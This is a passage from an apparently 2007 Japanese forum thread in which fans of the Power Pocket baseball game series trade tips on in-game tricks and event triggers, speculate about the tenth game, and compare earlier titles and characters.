87 :枯れた名無しの水平思考:2007/10/09(火) 00:58:55 ID:HAzBZOotO
>>81
アンヌ、奈津姫、武美、ダッシュの子があるんならいっそ全部の彼女の顔がほしい

88 :枯れた名無しの水平思考:2007/10/09(火) 01:26:19 ID:1ZY+vJLTO
電撃PSでやってたような、
各自のアレンジチームでペナント戦わせるような大会をポケでも開催してほしいなぁ

89 :枯れた名無しの水平思考:2007/10/09(火) 07:09:08 ID:t+KUzMKiO
>>88
改造厨出現の悪寒…。

90 :枯れた名無しの水平思考:2007/10/09(火) 07:11:58 ID:FUV2QN2o0
何度やってもブラックアルバムがでねえwwww
マジうんこ

91 :枯れた名無しの水平思考:2007/10/09(火) 09:07:09 ID:Kp2MO3/t0
パワポケ好きな人って遊戯王好きな人多いらしいね
相関関係にあるみたい

俺もそうなんだがどうですか

92 :枯れた名無しの水平思考:2007/10/09(火) 09:33:19 ID:NhWVhcH20
単に厨房が(ry

93 :枯れた名無しの水平思考:2007/10/09(火) 09:43:10 ID:NgUnf8n40
>>91
どうだろ?遊戯王は一年くらいしか続かんかったなあ
パワポケも最近時間が取れなくて9買わなかった。
それでもスパッと卒業できないわけだが・・・

94 :枯れた名無しの水平思考:2007/10/09(火) 13:16:40 ID:3IIGPe6kO
4年前からなぜ皇と統道と磯の顔アイがないのか疑問に思ってます

95 :枯れた名無しの水平思考:2007/10/09(火) 13:28:33 ID:MuMCALiqO
皇ほど宝の持ち腐れ投手は少ない
1の野球マスク並

そして4のアキミの扱いはかつてないほどひどい件

96 :枯れた名無しの水平思考:2007/10/09(火) 13:48:10 ID:KC419bzkO
10のミニゲームは雑巾掛けするのと麻雀みたいなのと叩いてかぶってジャンケンポンとコンコンノックなのか
PV見ただけだから内容は殆ど分からないけど
裏サクセスは戦車乗って移動してたし主人公が軍人風だったし昭和編?

97 :枯れた名無しの水平思考:2007/10/09(火) 14:01:23 ID:8jTKT6wm0
>>95
秋生ってそんな扱いひどかったっけ?

98 :枯れた名無しの水平思考:2007/10/09(火) 14:03:00 ID:drgfpAPA0
>>94
甲子園組で顔があるのは写六だけか
何故こいつだけ…

99 :枯れた名無しの水平思考:2007/10/09(火) 14:21:53 ID:DZ8z5Jxt0
デビルスターズにいるから

100 :枯れた名無しの水平思考:2007/10/09(火) 15:16:06 ID:lDWa3Sp0O
10面白そうだね。プロ球団でwifi対戦出来るの?サクセスはあまり興味無いから、ここが気になる

101 :枯れた名無しの水平思考:2007/10/09(火) 16:25:38 ID:6lijAj5C0
ポケ10の裏サクセスは、戦争編2だと予想する。
まあそうするとコンコンノックも2のミニゲームだから2と被りすぎだけどな。まあ一応下画面タッチに変わったけど。

102 :枯れた名無しの水平思考:2007/10/09(火) 16:41:13 ID:Rdx9eSfN0
ポケ8の地雷の裏技って時間切れギリギリで中断すると
時間無制限で地雷が全部見えるんだっけ?あれ難しいんだよな

103 :枯れた名無しの水平思考:2007/10/09(火) 16:49:18 ID:8VyFZmYTO
最近9を購入した口なんですけど、裏技のアルバム→サクセスのポイント貰えるのがどうやっても出来ないです。
色んなサイト見てみても書いてあること同じだし…。


すいません誰かもう少し詳しく教えて貰えませんか?

104 :枯れた名無しの水平思考:2007/10/09(火) 16:52:02 ID:Kp2MO3/t0
それエミュレータの不具合

105 :枯れた名無しの水平思考:2007/10/09(火) 16:55:08 ID:Rdx9eSfN0
あつパワの続編出せや。改良してもっと楽しくしたやつ
あれで終わりはありえんだろ

106 :枯れた名無しの水平思考:2007/10/09(火) 16:57:02 ID:Rdx9eSfN0
とりあえず裏サクセスが地雷だったらブチ切れだと思う。手抜きだけはするな

107 :枯れた名無しの水平思考:2007/10/09(火) 17:22:49 ID:RGrj5qli0
裏地雷でも買っちゃうかも

地雷ゲームを改良して超中毒ゲームにはできないかな?
地雷で落ち物とか。いやこれは悪い例だけど

108 :枯れた名無しの水平思考:2007/10/09(火) 17:50:22 ID:8jTKT6wm0
質問なんだが
一通り7までやり終えて8以降の作品がほしくなったわけだが。
今、DSって何円ぐらいで売ってるものなの?

109 :枯れた名無しの水平思考:2007/10/09(火) 17:57:24 ID:xNe3JE270
中古なら1万くらいで買えるんじゃないの?
俺が旧型中古で買ったときは1万2千だった(発売して2週間ぐらいのとき

110 :103:2007/10/09(火) 18:14:54 ID:8VyFZmYTO
>>104
…ちゃんと新品買ったよ。
アルバム→サクセスでX押しっぱで画面タッチでしょ?
何回やっても出来ない…

111 :枯れた名無しの水平思考:2007/10/09(火) 18:53:35 ID:3JyN42cs0
>>103
俺もそれ何回やっても出来なくて諦めた。
ちなみに発売後1週間以内に購入
DS本体が原因かもしれない

112 :枯れた名無しの水平思考:2007/10/09(火) 18:54:08 ID:NhWVhcH20
>>110
ちょっとテンポアップしてみ?

113 :枯れた名無しの水平思考:2007/10/09(火) 19:40:25 ID:Wj9RUqTv0
財産の問題で4か5どっちかを買おうと思うんだがどっちがオススメ?
それぞれのポイントを添えて頼む。

114 :枯れた名無しの水平思考:2007/10/09(火) 19:50:02 ID:g6rTw0xZ0
デビルスターズってコレまでのサクセスにでてきた?


115 :枯れた名無しの水平思考:2007/10/09(火) 19:58:27 ID:NhWVhcH20
>>113
>>3-4読んでご自由に

116 :枯れた名無しの水平思考:2007/10/09(火) 20:18:34 ID:fMribez00
>>114
今まで出てきた強い奴らをまとめたのがデビルスターズ
サクセスででてきたら時間軸上成立し得ない

117 :枯れた名無しの水平思考:2007/10/09(火) 21:13:45 ID:RGrj5qli0
時間犯罪者っていうんだっけ?
6正史で主人公が担当した犯人は捕まってるけど他にもいるはずだよな
もう出てこないんかね


118 :枯れた名無しの水平思考:2007/10/09(火) 21:21:21 ID:rzaO8tE60
3・6・8は人を選ぶな。万人にオススメはできない

119 :枯れた名無しの水平思考:2007/10/09(火) 21:30:00 ID:RXUf6UM+0
>>116
つっても冬野とか布具理とか雑魚もはいっててそいつら登板
されたときめった打ちできて萎えた

120 :枯れた名無しの水平思考:2007/10/09(火) 21:30:30 ID:4j4/XKgQO
俺の6バグってやがる

121 :枯れた名無しの水平思考:2007/10/09(火) 21:36:27 ID:Rc7H6/x10
>>97
裏サクセスでの扱いがあれって言いたいんじゃないか?
4→場合によって死ぬ
7→親友を殺す(殺される)
9→最初から死んでました><
まあ、んなこと言ったら美咲はどうよって話だが。

>>102
wiki見れ。ver2がある。

122 :枯れた名無しの水平思考:2007/10/09(火) 21:50:46 ID:8jTKT6wm0
>>109
やっぱりDSはまだまだ高いよなあ。
3桁ならすぐにでも買うのに…
>>121
確かに出るたびに死んでるねえ…
4のイベントで微妙にあせった覚えもある…
どうでもいいが9のネタばれっぽい予感…


教えてくれてありがとう。

123 :枯れた名無しの水平思考:2007/10/09(火) 21:59:59 ID:Rc7H6/x10
>>122
4桁はともかく3桁はないだろ、常考・・・。ゲームハードが3桁に落ちることはまずない。
あとネタバレすまんかった。

124 :枯れた名無しの水平思考:2007/10/09(火) 22:22:16 ID:8dCplnKfO
>>113
4と5ならどちらでもいいと思うけど、忙しいからすぐクリアして終わりにしたいっていうなら4
シリーズの最高傑作一つやれば充分って事なら5を薦める

125 :枯れた名無しの水平思考:2007/10/09(火) 22:29:44 ID:mAn1sv2YO
どの作品を最高傑作と思うかは人それぞれだと思うが

126 :枯れた名無しの水平思考:2007/10/09(火) 22:44:53 ID:6SqfKDIa0
新しい情報でてないかああ?

127 :枯れた名無しの水平思考:2007/10/09(火) 22:48:00 ID:3IIGPe6kO
デビルスターズはよくわからんな
なぜかアフロ猪狩が入ってたり、野球マスクとか小角の能力が変わってたり

128 :枯れた名無しの水平思考:2007/10/09(火) 22:54:08 ID:reRCxkg60
デビルスターズはもはやドリームチームに近いな
俺はパワフルで対デビルスターズやって腕試しくらいにしか使わない

129 :枯れた名無しの水平思考:2007/10/09(火) 22:55:44 ID:PyzqPl6r0
アフロ猪狩は5で敵チームに出てくるけど

130 :枯れた名無しの水平思考:2007/10/09(火) 23:47:33 ID:drgfpAPA0
4の小角は顔が皇だったな…

131 :枯れた名無しの水平思考:2007/10/10(水) 00:24:31 ID:iGXa1bw7O
9のオリジナル変化球覚えるイベントですが、
河川敷とグラウンドではどちらをうろつくべきなんでしょうか

132 :枯れた名無しの水平思考:2007/10/10(水) 00:26:32 ID:r0s6n6r90
グラウンドのほうが発生確率が高い&発生するまでにうろつく回数が少なくてすむ。
ただ日祝日の?の時限定なのは注意。

133 :枯れた名無しの水平思考:2007/10/10(水) 00:38:23 ID:iGXa1bw7O
>>132
ありがとうございます

あと発生時期があるのかなとうろつきコマンド出て4月中ずっと河川敷に行きましたが
起きませんでした。運が悪いだけかもしれませんが
発生時期が何月以降とかあるんですか?

134 :枯れた名無しの水平思考:2007/10/10(水) 00:51:19 ID:r0s6n6r90
>>133
河川敷の場合は9回以上うろついた後、日祝日のみ発生。ちなみにグラウンドは3回以上。

135 :枯れた名無しの水平思考:2007/10/10(水) 01:06:36 ID:iGXa1bw7O
>>134
回数+日にちが決まってたんですか・・・
質問ばっかですみませんでした

136 :枯れた名無しの水平思考:2007/10/10(水) 02:22:58 ID:1NcJMeSGO
9のポイント100ゲットする奴って一回オンリーかな?
正直少森寺で30ポイントゲットするのに飽きてきたんだが

137 :枯れた名無しの水平思考:2007/10/10(水) 03:31:43 ID:Ivk7PYfdO
攻略本にも土日祝ってあるけど実際他の曜日でもイベント起こるよな
いつも河川敷だからグラウンドはどうか知らないけど

138 :枯れた名無しの水平思考:2007/10/10(水) 03:47:29 ID:YWlJC7Nm0
パワポケダッシュの図鑑によると5の綾香関連で亀田が出るらしいが見たことがない。
どんな条件で出るんだ?

139 :枯れた名無しの水平思考:2007/10/10(水) 07:59:32 ID:rFio+x1PO
>>138
自分で攻略本読むなりググるなりご自由にどうぞ

140 :枯れた名無しの水平思考:2007/10/10(水) 12:46:20 ID:oZWn0Pt7O
亀だが4のアキミは表なら赤い服の女に付きまとわれるし裏なら主人公に殺されたり瀕死の状態で主人公にほっとかれてパラサイトに寄生されたりよくても暗殺ギルドからずっと逃走とシュールすぎる
新作が戦争編ならワクテカ
RPG編みたいに音楽のクオリティが高いといいなあ
6は好きだが3、8にはがっかりした
裏が地雷だけは勘弁してくれ

141 :枯れた名無しの水平思考:2007/10/10(水) 12:48:00 ID:PO6HtqzYO
俺もいつもうろつき河川敷でオリ変とってる。

9って彼女つくる意味あんまないよな。

超特殊能力欲しいなら未亡人でいいし、欲しくないなら釣りやってやる気と体力維持しながら強いの出来るし。


…と思うんだが俺はまだまだヒヨッコでしょうか。

142 :枯れた名無しの水平思考:2007/10/10(水) 13:07:55 ID:1NcJMeSGO
>>141
ラブダイナミックス無いとやってられないが社長令嬢も特殊能力狙いだとうまい
只いらない子は多いな

143 :枯れた名無しの水平思考:2007/10/10(水) 13:29:46 ID:OwGa+cn10
ちよ、貴子、夏菜は扱いが難しいよなぁ、好感度上げとかないと超特殊もらえないのにデートが微妙だから困る。
令嬢は持ち込んでエラー付いたら泣ける、武美は特殊能力が微妙。安定感は未亡人が断トツだな。

144 :枯れた名無しの水平思考:2007/10/10(水) 13:51:48 ID:+m1yJw6mO
このゲームのペナントってドラフトとか外国人獲得とかトレードとかあるんですか?

145 :枯れた名無しの水平思考:2007/10/10(水) 13:53:45 ID:dQ/3G/mL0
>>144
淡々と試合するだけ

146 :枯れた名無しの水平思考:2007/10/10(水) 14:07:07 ID:ZNf7ye5Q0
俺の野手ほとんど奪力持ちなんだよなぁ
令嬢は運次第だけどよい選手になることが多いから好きだ

147 :枯れた名無しの水平思考:2007/10/10(水) 14:08:30 ID:yeCt3jPl0
アレンジチームでオーペナやって結果にニヤニヤするのもいいけどさ、
実在12球団でもっと本格的な楽しみ方ある?

148 :枯れた名無しの水平思考:2007/10/10(水) 14:30:18 ID:qOALcyKPO
パワプロwiiと互換性のあるパワポケってあるのかな
wii決定版は10と互換らしいけど

149 :枯れた名無しの水平思考:2007/10/10(水) 15:03:14 ID:2/LwR0lK0
11月の試合でどうやったら武美が試合に出る?

150 :枯れた名無しの水平思考:2007/10/10(水) 15:18:59 ID:bJDYigEVO
甲子園の攻略ウィキってなんで無くなったんだっけ


管理人がバックレたんだっけ?重宝してたのに

151 :枯れた名無しの水平思考:2007/10/10(水) 15:42:19 ID:iGXa1bw7O
またすいません
オリジナル変化球はイベントが起きても必ず取得ってわけじゃないですよね?
とりあえず変化球をどれか一つでも覚えてればいいんですよね?

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